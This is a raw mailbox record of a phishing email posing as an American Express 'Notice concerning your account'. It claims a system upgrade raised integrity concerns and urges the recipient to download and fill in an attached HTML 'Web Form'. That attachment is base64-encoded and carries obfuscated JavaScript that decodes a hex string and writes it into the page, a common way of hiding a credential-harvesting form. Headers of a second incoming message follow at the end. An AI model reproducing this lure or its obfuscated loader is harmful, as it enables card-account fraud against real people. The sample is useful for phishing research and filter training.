From: "American Express" <Amex@acm.org>
To: amex@acm.org
Subject: Notice concerning your account.
Date: Sat, 16 Feb 2019 18:23:30 -0500
MIME-Version: 1.0
Message-ID: <1550357084e89957a6d99c3951e3944fff6fa94cda_@acm.org>
Content-Type: multipart/mixed; boundary="--=_Next_DE71_20161108_EC11.4.5.2391"
Status: O
X-Status: 
X-Keywords:                  
X-UID: 36

This is a multi-part message in MIME format.

----=_Next_DE71_20161108_EC11.4.5.2391
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"=
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head><META http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8">
</head>
<body>
<table border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D555 align=3Dcenter>
<tbody>
<tr>
<td bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</td>
<td bgColor=3D#ffffff rowSpan=3D1 width=3D521 colSpan=3D3>
<table cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<tbody>
<tr>
<td style=3D"BACKGROUND-COLOR: #ebebeb" rowSpan=3D1 width=3D"100%" colSpan=
=3D1>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px;=
 font-size: 6pt">&nbsp;</p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 14px" align=3Dcenter></p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px;=
 font-size: 6pt">&nbsp;</p></td></tr></TBODY></TABLE>
<table cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<tbody>
<tr>
<td rowSpan=3D1 width=3D"3.49%" colSpan=3D1>&nbsp;</td>
<td rowSpan=3D1 width=3D"12.21%" colSpan=3D1>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; font-size: 5pt">&nbsp;</p><img style=3D"BORDER-BOTTOM-STYLE: none;=
 BORDER-RIGHT-STYLE: none; BORDER-TOP-STYLE: none; BORDER-LEFT-STYLE: none"=
 alt=3D"naAE800556L" src=3D"cid:8dcbb633874a42e6" width=3D52.7 height=
=3D59.3></td>
<td rowSpan=3D1 width=3D"3.68%" colSpan=3D1>&nbsp;</td>
<td width=3D"30.62%" colSpan=3D1>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; font-size: 5pt">&nbsp;</p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; font-size: 14px"><B>In regards to Basic Card Member,</B></p></td>
<td width=3D"32.75%" colSpan=3D1>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; font-size: 5pt">&nbsp;</p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; font-size: 14px" align=3Dright>Card&reg;</p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; font-size: 14px" align=3Dright></p></td>
<td rowSpan=3D1 width=3D"3.88%" colSpan=3D1>&nbsp;</td>
<td rowSpan=3D1 width=3D"9.88%" colSpan=3D1><img style=
=3D"BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-TOP-STYLE:=
 none; BORDER-LEFT-STYLE: none" alt=3D"feSL16343tx" src=
=3D"cid:e8a7fd3d8fd7a222" width=3D51.2 height=3D37.6></td>
<td rowSpan=3D1 width=3D"3.49%" colSpan=
=3D1>&nbsp;</td></tr></TBODY></TABLE><img style=3D"BORDER-BOTTOM-STYLE: none;=
 BORDER-RIGHT-STYLE: none; BORDER-TOP-STYLE: none; BORDER-LEFT-STYLE: none"=
 alt=3D"cSlvSHwg621071" src=3D"cid:63b17fab927225b8" width=3D526.3 height=
=3D36.3></td>
<td bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</td></tr>
<tr>
<td bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</td>
<td bgColor=3D#ffffff rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</td>
<td bgColor=3D#ffffff rowSpan=3D1 width=3D492 colSpan=3D1>
<table cellSpacing=3D0 cellPadding=3D0 width=3D"99.61%">
<tbody>
<tr>
<td style=3D"BORDER-BOTTOM: #009bbb 1pt solid; BORDER-LEFT: #009bbb 1pt=
 solid; BACKGROUND-COLOR: #009bbb; WIDTH: 2.81%; BORDER-TOP: #009bbb 1pt=
 solid; BORDER-RIGHT: #009bbb 1pt solid" rowSpan=3D1 width=3D"2.14%" colSpan=
=3D1>
<p>&nbsp;</p></td>
<td style=3D"BORDER-BOTTOM: #009bbb 1pt solid; BACKGROUND-COLOR: #009bbb;=
 WIDTH: 18.42%; BORDER-TOP: #009bbb 1pt solid; BORDER-RIGHT: #009bbb 1pt=
 solid" rowSpan=3D1 width=3D"39.3%">
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; font-size: 5pt">&nbsp;</p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 white; font-size: 21.3px">HERE</p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; font-size: 5pt">&nbsp;</p></td>
<td style=3D"BORDER-BOTTOM: white 1pt solid; WIDTH: 5.78%; BORDER-TOP: white=
 1pt solid; BORDER-RIGHT: white 1pt solid" rowSpan=3D4 width=3D"3.12%"=
 colSpan=3D1>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 14px">&nbsp;</p></td>
<td style=3D"BORDER-BOTTOM: white 1pt solid; WIDTH: 69.4%; BORDER-COLLAPSE:=
 separate; VERTICAL-ALIGN: top; BORDER-TOP: white 1pt solid; BORDER-RIGHT:=
 white 1pt solid" rowSpan=3D3 width=3D"51.94%" colSpan=3D1>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 14px">&nbsp;</p>
<table style=3D"HEIGHT: 130px" border=3D0 cellSpacing=3D0 cellPadding=3D0=
 width=3D330 align=3Dcenter>
<tbody>
<tr>
<td style=3D"WIDTH: 326.19px" bgColor=3D#ffffff>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 13px">Online service platform was recently upgraded by=
 our Online team.<br><br>Due to this upgrade, intergrity concerns were=
 generated on your profile at the time of processing.<br><br>Herein, We=
 advise that cardmember complete a validation task by confirming what they=
 have on record with us.</p></td></tr></TBODY></TABLE>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 14px">&nbsp;</p>
<p style=3D"TEXT-ALIGN: center; MARGIN-TOP: 0px; FONT-FAMILY: Arial;=
 MARGIN-BOTTOM: 0px; COLOR: #4d4f53; font-size: 11pt"><SPAN style=3D"COLOR:=
 #000080">-<B> You Are To </B>-</SPAN></p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 11px">&nbsp;</p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 13px">Attached along this message is a Web Form.</p>
<UL style=3D"LIST-STYLE-TYPE: circle">
<LI style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; font-size: 10pt"><B>Kindly take a moment to download and complete=
 this form. </B></LI></UL>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 13px"><B>Thanks for your Card Membership,</B></p>
<p style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; font-size: 13px">American Express Customer Care.</p></td></tr>
<TR>
<TD style=3D"BORDER-BOTTOM: #009bbb 1pt solid; BORDER-LEFT: #009bbb 1pt=
 solid; BACKGROUND-COLOR: #009bbb; WIDTH: 2.81%; BORDER-TOP: #009bbb 1pt=
 solid; BORDER-RIGHT: #009bbb 1pt solid" width=3D"2.14%">&nbsp;</TD>
<TD style=3D"BORDER-BOTTOM: #009bbb 1pt solid; BACKGROUND-COLOR: #009bbb;=
 WIDTH: 18.42%; BORDER-TOP: #009bbb 1pt solid; BORDER-RIGHT: #009bbb 1pt=
 solid" width=3D"39.3%">&nbsp;</TD></TR>
<TR>
<TD style=3D"BORDER-BOTTOM: gray 1pt solid; BORDER-LEFT: gray 1pt solid;=
 WIDTH: 2.81%; BORDER-COLLAPSE: separate; VERTICAL-ALIGN: top; BORDER-TOP:=
 #009bbb 1pt solid; BORDER-RIGHT: white 0pt solid" rowSpan=3D1 width=
=3D"2.14%" colSpan=3D1>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #4d4f53; FONT-SIZE: 13.3px">&nbsp;</P></TD>
<TD style=3D"BORDER-BOTTOM: gray 1pt solid; WIDTH: 9.02%; BORDER-COLLAPSE:=
 separate; VERTICAL-ALIGN: top; BORDER-TOP: #009bbb 1pt solid; BORDER-RIGHT:=
 gray 1pt solid" rowSpan=3D1 width=3D"29.77%" colSpan=3D1>&nbsp;</TD></TR>
<TR>
<TD style=3D"BORDER-BOTTOM: white 1pt solid; BORDER-LEFT: white 1pt solid;=
 WIDTH: 21.24%; BORDER-COLLAPSE: separate; VERTICAL-ALIGN: top; BORDER-TOP:=
 white 0.5pt solid; BORDER-RIGHT: white 1pt solid" rowSpan=3D1 width=
=3D"41.44%" colSpan=3D2>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; FONT-SIZE: 10pt">&nbsp;</P></TD>
<TD style=3D"BORDER-BOTTOM: white 1pt solid; WIDTH: 69.4%; BORDER-COLLAPSE:=
 separate; VERTICAL-ALIGN: top; BORDER-TOP: white 1pt solid; BORDER-RIGHT:=
 white 1pt solid" rowSpan=3D1 width=3D"3.12%" colSpan=3D1>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 black; FONT-SIZE: 10pt">&nbsp;</P></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ffffff rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</TD>
<TD bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</TD></TR>
<TR>
<TD bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</TD>
<TD bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</TD>
<TD bgColor=3D#ececec rowSpan=3D1 width=3D492 colSpan=3D1>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 10pt">&nbsp;</P>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD rowSpan=3D1 width=3D"49%" colSpan=3D1>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 9pt" align=3Dcenter><A style=3D"COLOR: #666666"  >Our=
 Privacy Statement</A></P></TD>
<TD rowSpan=3D1 width=3D"2%" colSpan=3D1>|</TD>
<TD rowSpan=3D1 width=3D"49%" colSpan=3D1>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 9pt" align=3Dcenter><A style=3D"COLOR: #666666"  >Update=
 your Email
 </A></P></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 10pt">&nbsp;</P>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 9pt">Your account information is included above to help=
 you recognize this as a customer care e-mail from American Express. </P>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 9pt">&nbsp;</P>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 9pt">&copy; 2019 American Express. All rights=
 reserved.</P>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 10.7px">&nbsp;</P>
<P style=3D"MARGIN-TOP: 0px; FONT-FAMILY: Arial; MARGIN-BOTTOM: 0px; COLOR:=
 #666666; FONT-SIZE: 10.7px"></P></TD>
<TD bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=3D1>&nbsp;</TD>
<TD bgColor=3D#ececec rowSpan=3D1 width=3D15 colSpan=
=3D1>&nbsp;</TD></TR></TBODY></TABLE>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"MIN-WIDTH: 550px; LINE-HEIGHT: 0px; FONT-SIZE: 0px" height=3D1=
 rowSpan=3D1 colSpan=3D1></TD></TR>
</TBODY>
</TABLE>
</BODY>
</HTML>

----=_Next_DE71_20161108_EC11.4.5.2391
Content-Type: application/octet-stream; name="AENBTC1201002201.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AENBTC1201002201.html"

PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlv
bmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5z
aXRpb25hbC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0
bWwiPg0KPGhlYWQ+PG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0
ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQoNCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZh
c2NyaXB0Ij52YXIgaSx0PSIwZDgwYTMzYzgyMTk0NDc0ZjE0MzE1NDY1OTc1MDA0NTQyMDU2
ODI3NDk2ZDA2YzYzZTUwZDMwYTkzYzU2ODc3NDg2ZDY2YzMyMDk2YzM2MTA2ZTI2NzEzZDEy
MjY2NTk2ZTUyZDU1NTk1MzIyMjYzZTAwZDkwYTQzYzE2ODQ2NTA2MTQ2NDMzZTEwZDAwYTgz
YzQ2ZDA2NTQ3NDI2MTkyMDA2ODU3NDg3NDM3MDYyZDE2NTU3MTg3NTg2OTQ3NjMzZDMyMjQ0
MzY2ZjA2ZTQ3NDU2NTU2ZTY3NDkyZDU1NDA3OTM3MDY2NTEyMjIyMDE2MzI2ZjY2ZTQ3NDE2
NTY2ZTA3NDAzZDAyMjY3NDE2NTU3ODU3NDAyZjA2ODk3NDQ2ZDQ2YzUzYjQyMDk2MzE2ODk2
MTU3MjE3MzU2NTY3NDUzZDE3NTg3NDc2NjMyZDAzODMyMjczZTIwZDAwYTczYzI2YzA2OTQ2
ZTQ2YjYyMDk3MjQ2NTY2YzgzZDkyMjE3MzQ2ODM2ZjE3MjY3NDM2Mzc3NTc3NDgyMDM2OTI2
Mzk2ZjI2ZTAyMjMyMDI2ODQ3MjA2NTQ2NjQzZDgyMjc2ODU3NDI3NDE3MDI3MzIzYTYyZjky
ZjE3NDU3MjA2MTU3Njk2NTE2YzIyZTI2MTk2ZDk2NTA3MjM2OTI2MzA2MTU2ZTI2NTM3ODc3
MDY3MjQ2NTI3MzE3MzIyZTk2Mzc2ZjU2ZDEyZjk2Mzc3NDg2ZTg3Nzg3NDMyZjk2NjQ2MTM3
NjE2OTY2MzU2ZjA2ZTYyZTY2OTM2Mzk2ZjYyMjgyMDE3NDA3OTY3MDg2NTUzZDkyMjA2OTg2
ZDg2MTc2NzM2NTAyZjc3ODAyZDg2OTU2Mzk2ZjI2ZTQyMjQzZTUwZDUwYTEzYzA3MzY2Mzc3
Mjc2OTk3MDY3NDQyMDg3Mzg3MjU2MzQzZDcyMjA2ODQ3NDc3NDg3MDIzYTUyZjEyZjM3NzI3
NzI3NzIyZTg3NDE2MTQ2OTM2YzY2Nzk2MTk3NDc2NTA2NzU2OTU2MTg2ZTU3NDIyZTI2MzM2
ZjE2ZDcyZjg2Mzg2MTc3NDI2MTY2YzY2ZjU2NzIyZjc3Njk2OTQ2NTA3NzEyZjM2YTI2MTU3
NjY2MTg3MzU2MzU3MjY2OTY3MDE3NDEyZjQ2MzY2MTM3MDY3NDk2MzU2ODQ2MTgyZTM2YTE3
MzEyMjAzZTgwZDYwYTIzYzYyZjU3Mzc2MzY3MjY2OTA3MDg3NDIzZTcwZDYwYTgzYzIyZjI2
ODQ2NTM2MTQ2NDkzZTkwZDgwYTYzYzk2MjM2ZjA2NDg3OTYzZTIwZDkwYTczYzAyZjY2Mjk2
ZjY2NDE3OTYzZTIwZDgwYTczYzEyZjE2ODQ3NDc2ZDk2YzczZTAiLHg9IiI7Zm9yKGk9MDtp
PHQubGVuZ3RoO2krPTMpe3grPXVuZXNjYXBlKCIlIit0LnN1YnN0cihpLDIpKTt9ZG9jdW1l
bnQud3JpdGUoeCk7PC9zY3JpcHQ+DQo8L2hlYWQ+DQo8L2h0bWw+

----=_Next_DE71_20161108_EC11.4.5.2391--


From jose@monkey.org Mon Feb 18 08:26:19 2019 +0000
Return-Path: info@tallercuatro.com
Delivered-To: jose@monkey.org
X-FDA: 75178053678.14.beast84_3728e5460214f
X-Spam-Summary: 50,0,0,552e44aedb278515,d41d8cd98f00b204,info@tallercuatro.com,:,RULES_HIT:2:41:72:355:379:455:495:800:871:962:967:973:978:983:988:989:1000:1189:1208:1260:1261:1263:1308:1309:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1535:1567:1570:1571:1573:1575:1588:1589:1594:1606:1714:1719:1730:1747:1777:1792:2194:2198:2199:2200:2393:2525:2561:2564:2612:2682:2685:2693:2859:2890:2909:2919:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3040:3138:3139:3140:3141:3142:3148:3552:3586:3866:3867:3868:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4120:4180:4181:4321:4504:4511:4512:4514:4516:4552:5000:6261:6354:6506:6650:6669:6671:6674:6747:7281:7514:8599:8603:8957:8987:9025:9388:9908:10004:10049:10346:11026:11473:11657:11658:11914:12043:12073:12075:12295:12438:12517:12519:12555:12740:12764:12895:12903:12986:13007:13025:13139:13439:13975:14096:14106:14194:14596:14659:14877:18000:21080:21433:21436:21450:21451:21524:21554:21627:21810:21819:30001:30016:30
X-HE-Tag: beast84_3728e5460214f
X-Filterd-Recvd-Size: 9781
Received: from mail.tallercuatro.com (mail.tallercuatro.com [181.224.251.201])
	by imf29.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 18 Feb 2019 08:26:18 +0000 (UTC)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.tallercuatro.com (Postfix) with ESMTP id 86750280C6E
	for <jose@monkey.org>; Sun, 17 Feb 2019 21:28:02 -0500 (-05)
Received: from mail.tallercuatro.com ([127.0.0.1])
	by localhost (mail.tallercuatro.com [127.0.0.1]) (amavisd-new, port 10032)
	with ESMTP id hLB-8w10BriD for <jose@monkey.org>;
	Sun, 17 Feb 2019 21:28:02 -0500 (-05)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.tallercuatro.com (Postfix) with ESMTP id 2F371280C5C
	for <jose@monkey.org>; Sun, 17 Feb 2019 21:28:02 -0500 (-05)
X-Virus-Scanned: amavisd-new at tallercuatro.com
Received: from mail.tallercuatro.com ([127.0.0.1])
	by localhost (mail.tallercuatro.com [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id al6-5MNL86XO for <jose@monkey.org>;
	Sun, 17 Feb 2019 21:28:02 -0500 (-05)
Received: from tallercuatro.com (unknown [89.249.65.242])
	by mail.tallercuatro.com (Postfix) with ESMTPSA id 23659280C35
	for <jose@monkey.org>; Sun, 17 Feb 2019 21:28:00 -0500 (-05)
